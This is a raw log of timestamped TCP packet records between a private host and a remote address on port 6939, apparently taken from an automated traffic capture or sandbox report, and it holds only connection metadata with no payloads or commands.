May 24, 2024 05:09:50.561882019 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.561892033 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.561925888 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.561958075 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.562633991 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.562648058 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.562659025 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.562699080 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.563338041 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.563348055 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.563399076 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.564073086 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.564084053 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.564121008 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.564817905 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.564867020 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.565028906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.565380096 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.565390110 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.565429926 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.565771103 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.565781116 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.565815926 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.566488028 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.566684008 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.568797112 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.569727898 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.569901943 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.569926023 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.570293903 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.570343971 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.570952892 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.570972919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.570988894 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.571028948 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.571388006 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.571434021 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.573534012 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.579322100 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.579412937 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.579464912 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.579766035 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.579926014 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.580173016 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.580188990 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.580200911 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.580236912 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.580876112 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.580943108 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.583053112 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.583233118 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.583244085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.583282948 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.583611965 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.583765030 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.583961010 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.584338903 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.584350109 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.584389925 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.585036993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.585160017 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.591212034 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.591417074 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.591568947 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.591687918 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.591698885 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.591902971 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.592253923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.594050884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.594064951 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.594118118 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.594167948 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.594216108 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.594499111 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.594831944 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.594842911 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.594854116 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.594883919 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.594921112 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.596003056 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.596016884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.596071959 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.597609997 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.597790003 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.597842932 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.598082066 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.598095894 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.598144054 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.598640919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.600752115 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.600765944 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.600804090 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.625917912 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.626065016 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.626142025 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.626410961 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.626579046 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.626813889 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.626825094 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.627010107 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.627497911 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.630631924 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.630693913 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.633749008 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.633930922 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.633981943 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.634232998 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.634244919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.634433031 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.637285948 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637296915 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637312889 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637325048 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637335062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637345076 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637346983 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.637357950 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637370110 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637376070 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.637382030 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637396097 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637401104 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.637409925 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637420893 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.637429953 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637437105 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.637470961 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.637842894 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637859106 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637877941 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.637891054 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.638027906 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.638027906 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.639038086 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.639064074 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.639077902 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.639094114 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.639108896 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.639209986 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.639466047 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.639477968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.639487028 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.639524937 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.640386105 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.640397072 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.640404940 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.640414953 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.640465021 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.640496969 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.641237974 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.641247988 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.641258001 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.641295910 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.641331911 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.642067909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.642079115 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.642134905 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.644193888 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.644368887 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.644431114 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.644747972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.644759893 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.644809008 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.645457029 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.645838022 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.645849943 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.645859957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.645895958 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.645950079 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.646585941 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.646599054 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.646651030 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.647294044 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.647306919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.647356033 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.648964882 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.648977041 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.649025917 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.649418116 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.649581909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.649632931 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.649856091 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.650166988 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.650177956 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.650223017 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.653727055 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.653737068 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.653790951 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.653856039 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.654021978 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.654160976 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.654438019 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.654511929 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.654742956 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.654753923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.654798985 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.655297995 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.655308008 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.655354977 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.658452034 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.658704042 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.658799887 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.658878088 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.659147024 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.659308910 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.659493923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.659504890 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.659513950 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.659523964 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.659547091 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.659586906 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.663191080 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.668174982 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.668232918 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.668322086 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.668615103 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.668788910 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.668926954 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.668937922 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.668946981 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.668956995 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.668987989 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.669025898 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.672046900 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.672209024 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.672219038 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.672267914 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.672489882 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.672647953 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.672799110 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.672810078 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.672858953 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.673346996 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.673608065 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.673665047 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.680526972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.680747986 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.680804014 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.680963993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.681272984 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.681282043 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.681292057 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.681427002 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.681427002 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.682876110 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.682887077 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.682938099 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.683028936 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.683311939 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.683322906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.683367968 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.683600903 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.683655977 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.683933973 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.683943987 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.683994055 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.685265064 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.686718941 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.686773062 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.686852932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.687043905 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.687239885 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.687319994 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.687330008 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.687380075 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.690699100 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.690709114 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.690763950 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.717525959 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.717535973 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.717629910 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.717859030 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.718234062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.718242884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.718251944 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.718485117 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.718485117 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.724720001 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.725411892 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.725559950 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.725579977 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.725738049 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.725747108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.725760937 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.726438046 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.726454020 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.726461887 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.726471901 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.727134943 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.727144957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.727153063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.728020906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.728029966 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.729861021 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.732152939 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.732168913 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.732244968 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.732244968 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.736987114 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.750917912 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.774789095 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.778307915 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.779603004 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.784358978 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.835426092 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:59.790313959 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:59.795455933 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:09:59.795627117 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:59.795670033 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:59.845457077 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:00.411706924 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:00.416490078 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:00.419158936 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:00.429773092 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:00.473475933 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:00.643661976 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:00.643995047 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:00.649719954 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:00.817044020 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:00.821216106 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:00.826086044 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:00.826287031 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:00.831216097 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:01.107840061 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:01.160164118 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:01.946013927 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:01.951076984 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:01.951147079 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:01.956110001 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.240175009 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.242243052 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.242443085 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.247029066 CEST	6939	49738	94.156.67.91	192.168.2.4
May 24, 2024 05:10:02.299715996 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.405575991 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.405575991 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.405699968 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.405699968 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.706070900 CEST	49738	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:10:02.802398920 CEST	6939	49738	94.156.67.91	192.168.2.4
